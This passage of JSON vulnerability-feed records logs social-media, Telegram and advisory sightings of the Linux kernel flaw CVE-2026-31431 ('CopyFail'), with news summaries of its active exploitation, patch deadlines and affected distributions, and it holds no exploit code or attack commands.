"vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/kasperskyb2b/2158", "content": "\ud83d\udc40 \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f APT \u0438 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0418\u0411 \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\ud83d\udfe2\u0412 \u0430\u0442\u0430\u043a\u0430\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 Silver Fox \u043d\u0430 \u043e\u0440\u0433\u0430\u043d\u0437\u0438\u0430\u0446\u0438\u0438 \u0432 \u0420\u0424 \u0438 \u0432 \u0418\u043d\u0434\u0438\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d \u043d\u043e\u0432\u044b\u0439 \u0431\u044d\u043a\u0434\u043e\u0440 ABCDoor. \u0420\u0435\u0442\u0440\u043e\u0441\u043f\u0435\u043a\u0442\u0438\u0432\u043d\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c 7 \u0432\u0435\u0440\u0441\u0438\u0439 \u0412\u041f\u041e, \u043f\u0435\u0440\u0432\u0430\u044f \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0434\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0430\u0436 2024 \u0433\u043e\u0434\u043e\u043c, \u043d\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u0435 \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u0430 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442\u0441\u044f \u043f\u043e \u0441\u0435\u0439 \u0434\u0435\u043d\u044c. \u041d\u0430\u0447\u0438\u043d\u0430\u044e\u0442\u0441\u044f \u0430\u0442\u0430\u043a\u0438 \u0441 \u0446\u0435\u043b\u0435\u0432\u043e\u0433\u043e \u0444\u0438\u0448\u0438\u043d\u0433\u0430 \u043d\u0430\u043b\u043e\u0433\u043e\u0432\u043e\u0439 \u0442\u0435\u043c\u0430\u0442\u0438\u043a\u0438. \n\n\ud83d\udfe3\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2026-31431 (CopyFail), \u0443\u0433\u0440\u043e\u0436\u0430\u044e\u0449\u0435\u0439 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0443 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u0441\u0431\u043e\u0440\u043e\u043a Linux. \u041d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u0430 \u0443\u0433\u0440\u043e\u0437\u0430 \u0434\u043b\u044f \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043d\u044b\u0445 \u0441\u0440\u0435\u0434:  Docker, LXC \u0438 Kubernetes.\n\n\ud83d\udd35\u0412 \u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440\u0435 \u043f\u0430\u043a\u0435\u0442\u043e\u0432 npm \u0431\u0443\u0448\u0443\u0435\u0442 \u044d\u043f\u0438\u0434\u0435\u043c\u0438\u044f Mini Shai-Hulud: \u0447\u0435\u0440\u0432\u044c \u043f\u043e\u0440\u0430\u0437\u0438\u043b \u043f\u0430\u043a\u0435\u0442\u044b SAP \u0438 intercom. \u0412\u0435\u0440\u043e\u044f\u0442\u043d\u043e \u0442\u0435 \u0436\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u043f\u0430\u043a\u0435\u0442\u044b lightning \u0432 PyPi. TTPs \u043f\u043e\u0445\u043e\u0436\u0438 \u043d\u0430 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0443 TeamPCP.\n\n\ud83d\udfe3\u0413\u0440\u0443\u043f\u043f\u0430 HeartlessSoul, \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043d\u0430\u044f \u043e\u0441\u0435\u043d\u044c\u044e 2025 \u0433\u043e\u0434\u0430, \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0430\u0432\u0438\u0430\u0446\u0438\u043e\u043d\u043d\u0443\u044e \u043f\u0440\u043e\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u0438 \u0432 \u0447\u0438\u0441\u043b\u0435 \u043f\u043e\u0445\u0438\u0449\u0430\u0435\u043c\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0434\u0435\u043b\u0430\u0435\u0442 \u043e\u0441\u043e\u0431\u044b\u0439 \u0430\u043a\u0446\u0435\u043d\u0442 \u043d\u0430 \u0444\u0430\u0439\u043b\u044b \u0433\u0435\u043e\u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c. \u041f\u0440\u0438\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u0435\u043d \u043f\u043e\u0434\u0445\u043e\u0434 \u043a \u0442\u0430\u0440\u0433\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044e: \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0440\u0435\u043a\u043b\u0430\u043c\u0438\u0440\u0443\u0435\u0442 \u0441\u0430\u0439\u0442\u044b-\u0444\u0430\u043b\u044c\u0448\u0438\u0432\u043a\u0438 \u0441 \u0442\u0440\u043e\u044f\u043d\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u041f\u041e \u0434\u043b\u044f \u0430\u0432\u0438\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c.\n\n\ud83d\udfe3\u0412\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0438 \u0442\u043e\u0436\u0435 \u0432\u043e\u043b\u043d\u0443\u044e\u0442\u0441\u044f \u043e \u043f\u043e\u0441\u0442\u043a\u0432\u0430\u043d\u0442\u043e\u0432\u043e\u0439 \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0438 \u2014 \u043d\u043e\u0432\u044b\u0439 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043b\u044c\u0449\u0438\u043a Kyber \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0432 \u0441\u0432\u043e\u0435\u0439 \u0440\u0430\u0431\u043e\u0442\u0435 \u0433\u0438\u0431\u0440\u0438\u0434\u043d\u044b\u0439 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c \u0441 \u041f\u041a\u0428.\n\n\ud83d\udd35\u041e\u0433\u0440\u043e\u043c\u043d\u044b\u0439 150-\u0441\u0442\u0440\u0430\u043d\u0438\u0447\u043d\u044b\u0439 \u043e\u0442\u0447\u0435\u0442 \u043e \u0441\u043b\u043e\u0436\u043d\u043e\u043c \u0412\u041f\u041e EasterBunny (pdf) \u0438 TTPs APT29/DarkHalo, \u0435\u0433\u043e \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0449\u0435\u0439. \u0421\u0440\u0435\u0434\u0438 \u043b\u044e\u0431\u043e\u043f\u044b\u0442\u043d\u044b\u0445 \u0434\u0435\u0442\u0430\u043b\u0435\u0439 \u2014 \u0436\u0451\u0441\u0442\u043a\u0430\u044f \u043f\u0440\u0438\u0432\u044f\u0437\u043a\u0430 \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u0430 \u043a \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0443, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u043d \u043d\u0430\u0446\u0435\u043b\u0435\u043d, \u043d\u0430 \u0434\u0440\u0443\u0433\u0438\u0445 \u043c\u0430\u0448\u0438\u043d\u0430\u0445 \u043f\u0440\u043e\u0441\u0442\u043e \u043d\u0435 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u0441\u044f.\n\n\ud83d\udfe3\u041d\u043e\u0432\u044b\u0435 \u0440\u0430\u0437\u043d\u043e\u0432\u0438\u0434\u043d\u043e\u0441\u0442\u0438 ClickFix: \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0446\u0435\u043f\u043e\u0447\u043a\u0443 \u043a\u043e\u043c\u0430\u043d\u0434 cmdkey \u0438 regsvr32 \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0412\u041f\u041e.\n\n\ud83d\udd35\u0417\u0430\u043a\u0440\u044b\u0442\u0430\u044f \u0432 \u0430\u043f\u0440\u0435\u043b\u044c\u0441\u043a\u043e\u043c Patch Tuesday CVE-2026-32202, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0430\u044f \u043a \u0443\u0442\u0435\u0447\u043a\u0435 \u0445\u044d\u0448\u0435\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0442\u0435\u043f\u0435\u0440\u044c \u043f\u043e\u043c\u0435\u0447\u0435\u043d\u0430 \u043a\u0430\u043a \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u0430\u044f. \u0414\u0435\u0444\u0435\u043a\u0442 \u0432\u043e\u0437\u043d\u0438\u043a \u0438\u0437-\u0437\u0430 \u043d\u0435\u043f\u043e\u043b\u043d\u043e\u0433\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0444\u0435\u0432\u0440\u0430\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0437\u0438\u0440\u043e\u0434\u0435\u044f CVE-2026-21510.\n\n\ud83d\udfe3\u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u0430\u044f \u0438\u0441\u0442\u043e\u0440\u0438\u044f \u2014 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043f\u043b\u0430\u0433\u0438\u043d \u0434\u043b\u044f WordPress \u0431\u044b\u043b \u0438\u0437\u0433\u043e\u0442\u043e\u0432\u043b\u0435\u043d \u0438\u0437 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0435\u0449\u0435 \u0432 2020 \u0433\u043e\u0434\u0443, \u043d\u043e \u043e\u0431\u0437\u0430\u0432\u0451\u043b\u0441\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c\u044e \u0442\u043e\u043b\u044c\u043a\u043e \u0432 2026. \n\n\ud83d\udd35\u0420\u0430\u0437\u0431\u043e\u0440 \u043c\u0430\u0441\u0441\u043e\u0432\u043e\u0439 \u0433\u043b\u043e\u0431\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u043f\u0430\u043c-\u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0441 \u0440\u0430\u0441\u0441\u044b\u043b\u043a\u043e\u0439 \u0444\u0430\u043b\u044c\u0448\u0438\u0432\u044b\u0445 SMS \u043e\u0431 \u043e\u043f\u043b\u0430\u0442\u0435 \u0434\u043e\u0440\u043e\u0436\u043d\u044b\u0445 \u043f\u043e\u0448\u043b\u0438\u043d \u0438 \u0448\u0442\u0440\u0430\u0444\u043e\u0432. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0436\u0435\u0440\u0442\u0432 \u0437\u0430\u043c\u0430\u043d\u0438\u0432\u0430\u044e\u0442 \u043d\u0430 \u0444\u0430\u043b\u044c\u0448\u0438\u0432\u044b\u0435 \u043f\u043b\u0430\u0442\u0451\u0436\u043d\u044b\u0435 \u0441\u0430\u0439\u0442\u044b \u0438 \u0441\u0430\u0439\u0442\u044b, \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0449\u0438\u0435 \u0412\u041f\u041e.\n\n\ud83d\udfe2\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-41940 \u0432 \u043f\u0430\u043d\u0435\u043b\u044f\u0445 cPanel \u0438 WHM, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0430\u0434\u043c\u0438\u043d\u0441\u043a\u0438\u0435 \u043f\u0440\u0430\u0432\u0430 \u0431\u0435\u0437 \u0432\u0441\u044f\u043a\u043e\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438 \u0435\u0449\u0451 \u0434\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f. \u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0441\u0442\u044c cPanel, \u044d\u0442\u043e \u0432\u0435\u0441\u044c\u043c\u0430 \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u043e \u2014 \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c\u0441\u044f \u043d\u0443\u0436\u043d\u043e \u0432 \u0441\u0440\u043e\u0447\u043d\u043e\u043c \u043f\u043e\u0440\u044f\u0434\u043a\u0435. \n\n\ud83d\udfe3\u041d\u0435\u043e\u0436\u0438\u0434\u0430\u043d\u043d\u043e\u0435 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435 \u0433\u0435\u043e\u0433\u0440\u0430\u0444\u0438\u0438 \u0441\u043a\u0430\u043c-\u0446\u0435\u043d\u0442\u0440\u043e\u0432 (\u0438 \u0431\u043e\u0440\u044c\u0431\u044b \u0441 \u043d\u0438\u043c\u0438) \u2014 \u0434\u0435\u0432\u044f\u0442\u044c \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043e\u0444\u0438\u0441\u043e\u0432 \u0437\u0430\u043a\u0440\u044b\u043b\u0438 \u0432 \u0414\u0443\u0431\u0430\u0435.\n\n#\u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 #APT @\u041f2\u0422", "creation_timestamp": "2026-05-04T09:44:28.000000Z"}, {"uuid": "3353c297-7903-4005-9957-e7f92fcbf3a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82735", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a RK35xx-CopyFail-Hotfix\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Qengineering\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-04 08:56:14\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nRK35xx CopyFail Hotfix: CVE-2026-31431 Patch for Ubuntu 24.04\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-04T09:00:04.000000Z"}, {"uuid": "a3acd964-129a-419f-af29-d56b6747f8b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mkzjyo3dghq2", "content": "Linux: CISA Warns of Linux Kernel Zero-Day Vulnerability Exploited in Active Attacks CISA Warns of Actively Exploited Linux Kernel Vulnerability (CVE-2026-31431) The U.S. Cybersecurity and Infrastr...\n\n#cyber #Vulnerability\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-04T11:14:37.229108Z"}, {"uuid": "a8b72110-e060-4d33-9c11-3cf3eb4277eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3mkzlvnvq2q2q", "content": "CISA reports active exploitation of "Copy Fail" Linux kernel flaw (CVE-2026-31431) allowing local users to gain root access. Federal agencies must patch by May 15 under BOD 22-01. #LinuxKernel #RootAccess #USA", "creation_timestamp": "2026-05-04T11:45:24.229336Z"}, {"uuid": "6c614102-c3c9-4853-bd03-e51836a242ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mkzyhprqbp2u", "content": "\ud83d\udd17 CVE : CVE-2026-31431", "creation_timestamp": "2026-05-04T15:30:14.888541Z"}, {"uuid": "0d8520a9-0f6b-4368-821b-870b59fac7df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pixelsandpulse.bsky.social/post/3mkznjpeaxq2g", "content": "A quiet Linux kernel flaw, 'Copy Fail' (CVE-2026-31431), has been actively exploited since 2017, allowing root access with a tiny script. This LPE is a major threat to cloud container security, proving even 'boring' bugs can be\u2026\n\nhttps://www.tpp.blog/qoupvah\n\n#cybersecurity #cve202631431 #copyfail", "creation_timestamp": "2026-05-04T12:14:30.353343Z"}, {"uuid": "4cbf6d53-fe76-46f4-8f7c-dbaf8c0b616d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/mhatta.org/post/3mkzofu7rvx25", "content": "copy.fail (CVE-2026-31431): a small Linux kernel bug with an unusually big blast radius | Jorijn Schrijvershof", "creation_timestamp": "2026-05-04T12:30:14.962219Z"}, {"uuid": "327adf20-1743-4895-bc36-9cae6cd0c99f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.cert.se/2026/05/allvarlig-sarbarhet-i-flertal-linuxdistributioner.html", "content": "", "creation_timestamp": "2026-05-04T03:00:00.000000Z"}, {"uuid": "259c62ea-0f89-44af-b747-9be6eef5a94d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://gist.github.com/iinikolaev/2ea316b1d8192f31153454117bc2870d", "content": "", "creation_timestamp": "2026-05-04T13:26:19.000000Z"}, {"uuid": "47694d3a-063f-4142-bdff-58a40b876492", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mkzumywkak2d", "content": " **Linux Security Alert! **\nThe 'Copy Fail' (CVE-2026-31431) flaw lets ANY local user gain root access on SUSE & other distros.  Read more->  tinyurl.com/mr5e2y7d  #SUSE #Security", "creation_timestamp": "2026-05-04T14:21:39.931131Z"}, {"uuid": "1d98ffb8-5ff3-4351-9ae3-f20361dcbb38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/rockylinux.org/post/3mkzweewt5p27", "content": "Kernel crypto vulnerability alert: CVE-2026-31431 (Copy Fail) affects Rocky Linux users. Our community is tracking patches and next steps in real time.\nRocky-specific guidance: forums.rockylinux.org/t/cve-2026-3... \n#RockyLinux #LinuxSecurity", "creation_timestamp": "2026-05-04T14:52:35.570567Z"}, {"uuid": "3b3ae144-d3d3-4d5c-b7c1-6dcaa6e76391", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82768", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a play-go-copy-fail-cve-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a imkk000\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-04 13:57:48\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-04T14:00:04.000000Z"}, {"uuid": "809b05cc-6339-45e6-aa89-b25566bea94f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ef-edulog/a3bc51ea1b488ff23e2733a1975eee72", "content": "", "creation_timestamp": "2026-05-04T15:10:04.000000Z"}, {"uuid": "1f66d444-509b-4289-b1dc-8b82df6a9111", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3mkzzcresg222", "content": "Attackers are exploiting CVE-2026-31431, aka Copy Fail, a long-standing Linux kernel flaw allowing privilege escalation to root via in-memory cache modification of setuid-root binaries. #LinuxFlaw #KernelBug #USA", "creation_timestamp": "2026-05-04T15:45:22.616772Z"}, {"uuid": "3f28076e-51e1-4f78-a4ee-6ad773eccf50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/calimegai.bsky.social/post/3ml226lewgw2l", "content": "CISA ajoute la faille Linux CVE-2026-31431, exploit\u00e9e en local pour escalade de privil\u00e8ges, \u00e0 son catalogue KEV. Plusieurs distrib Linux sont concern\u00e9es. Restez vigilants ! \ud83d\udd12\ud83d\udc27 #CyberSecurity #calimeg ", "creation_timestamp": "2026-05-04T16:00:56.140940Z"}, {"uuid": "82891b10-80b1-46fd-8f30-bcf89327dac3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/thedailytechfeed.com/post/3ml22hqye7k24", "content": "Urgent: 'Copy Fail' vulnerability (CVE-2026-31431) in Linux kernels since 2017 allows root access to unprivileged users. Patch immediately to secure your systems. #Linux #CyberSecurity #CVE202631431 Link: thedailytechfeed.com/critical-lin...", "creation_timestamp": "2026-05-04T16:06:03.698001Z"}, {"uuid": "6b000c73-6277-430e-8c05-ea626527f7ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://gist.github.com/dmc5179/701d2f649e64544e945a860a2ffca8ae", "content": "", "creation_timestamp": "2026-05-04T16:09:14.000000Z"}, {"uuid": "587b4912-9779-486a-840b-316697aa2271", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml24b52qkj2h", "content": "Re: Precise disclosure contents for copyfail (Re: [oss-security] CVE-2026-31431: CopyFail: linux local privilege scalation)", "creation_timestamp": "2026-05-04T16:38:08.664879Z"}, {"uuid": "4521916e-10e8-4523-bd47-0c53827814f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml24k3kog62i", "content": "Re: Precise disclosure contents for copyfail (Re: [oss-security] CVE-2026-31431: CopyFail: linux local privilege scalation)", "creation_timestamp": "2026-05-04T16:43:08.971763Z"}, {"uuid": "bace5b3f-0c5d-4302-9a14-bce2686c43df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml25wryws52b", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-05-04T17:08:08.918120Z"}, {"uuid": "fada86af-9d73-4c63-8e5b-1860df7f7c14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml26f6knaz2j", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-05-04T17:16:11.771114Z"}, {"uuid": "0c3a26c9-dfec-407c-8f6b-9ca2f5906ae1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml26o55c7o2e", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-05-04T17:21:12.685982Z"}, {"uuid": "451d4f93-a398-4e8f-9a7c-61d79065db20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml27a2umi72z", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-05-04T17:31:13.970667Z"}, {"uuid": "61d172de-9152-4663-8888-75931a3726d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ronan.mastodon.ronandev.ovh.ap.brid.gy/post/3ml277e5neia2", "content": "\"CopyFail\" (CVE-2026-31431) : un utilisateur local sans privil\u00e8ge peut \u00e9crire 4 bytes contr\u00f4l\u00e9s dans le cache de TOUT fichier lisible \u27a1\ufe0f \u00e9l\u00e9vation root. Si vous avez du multi-tenant, des conteneurs, des CI runners non fiables : mettre \u00e0 jour. Ordinateur perso ? Moins urgent mais mettez \u00e0 jour [\u2026]", "creation_timestamp": 